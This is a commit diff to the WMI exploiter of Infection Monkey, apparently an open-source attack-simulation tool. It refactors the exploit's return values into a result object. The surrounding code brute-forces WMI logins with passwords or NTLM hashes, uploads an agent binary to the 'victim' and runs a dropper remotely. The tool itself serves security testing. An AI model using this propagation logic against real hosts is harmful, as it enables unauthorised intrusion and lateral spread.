Agent: modify wmiexec.py to return ExploitResultData

monkey/infection_monkey/exploit/wmiexec.py

@@ -12,6 +12,7 @@ from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.tools.helpers import get_monkey_depth
 from infection_monkey.exploit.tools.smb_tools import SmbTools
 from infection_monkey.exploit.tools.wmi_tools import AccessDeniedException, WmiTools
+from infection_monkey.i_puppet import ExploiterResultData
 from infection_monkey.model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
 from infection_monkey.utils.commands import build_monkey_commandline
 
@@ -23,11 +24,8 @@ class WmiExploiter(HostExploiter):
     EXPLOIT_TYPE = ExploitType.BRUTE_FORCE
     _EXPLOITED_SERVICE = "WMI (Windows Management Instrumentation)"
 
-    def __init__(self, host):
-        super(WmiExploiter, self).__init__(host)
-
     @WmiTools.dcom_wrap
-    def _exploit_host(self):
+    def _exploit_host(self) -> ExploiterResultData:
 
         creds = _get_exploit_user_password_or_hash_product(self.options["credentials"])
 
@@ -50,16 +48,17 @@ class WmiExploiter(HostExploiter):
 
             except socket.error:
                 logger.debug(f"Network error in WMI connection to {self.host}")
-                return False
+                return self.exploit_result
 
             except Exception as exc:
                 logger.debug(
                     f"Unknown WMI connection error to {self.host}: "
                     f"{exc} {traceback.format_exc()}"
                 )
-                return False
+                return self.exploit_result
 
             self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
+            self.exploit_result.exploitation_success = True
 
             # query process list and check if monkey already running on victim
             process_list = WmiTools.list_object(
@@ -72,7 +71,7 @@ class WmiExploiter(HostExploiter):
                 wmi_connection.close()
 
                 logger.debug("Skipping %r - already infected", self.host)
-                return False
+                return self.exploit_result
 
             downloaded_agent = self.agent_repository.get_agent_binary(self.host.os["type"])
 
@@ -89,7 +88,7 @@ class WmiExploiter(HostExploiter):
 
             if not remote_full_path:
                 wmi_connection.close()
-                return False
+                return self.exploit_result
             # execute the remote dropper in case the path isn't final
             elif remote_full_path.lower() != self.options["dropper_target_path_win_64"]:
                 cmdline = DROPPER_CMDLINE_WINDOWS % {
@@ -119,7 +118,7 @@ class WmiExploiter(HostExploiter):
                 )
 
                 self.add_vuln_port(port="unknown")
-                success = True
+                self.exploit_result.propagation_success = True
             else:
                 logger.debug(
                     "Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
@@ -130,14 +129,12 @@ class WmiExploiter(HostExploiter):
                     result.ReturnValue,
                     cmdline,
                 )
-                success = False
 
             result.RemRelease()
             wmi_connection.close()
             self.add_executed_cmd(cmdline)
-            return success
 
-        return False
+        return self.exploit_result
 
 
 def _get_exploit_user_password_or_hash_product(credentials: Mapping) -> List: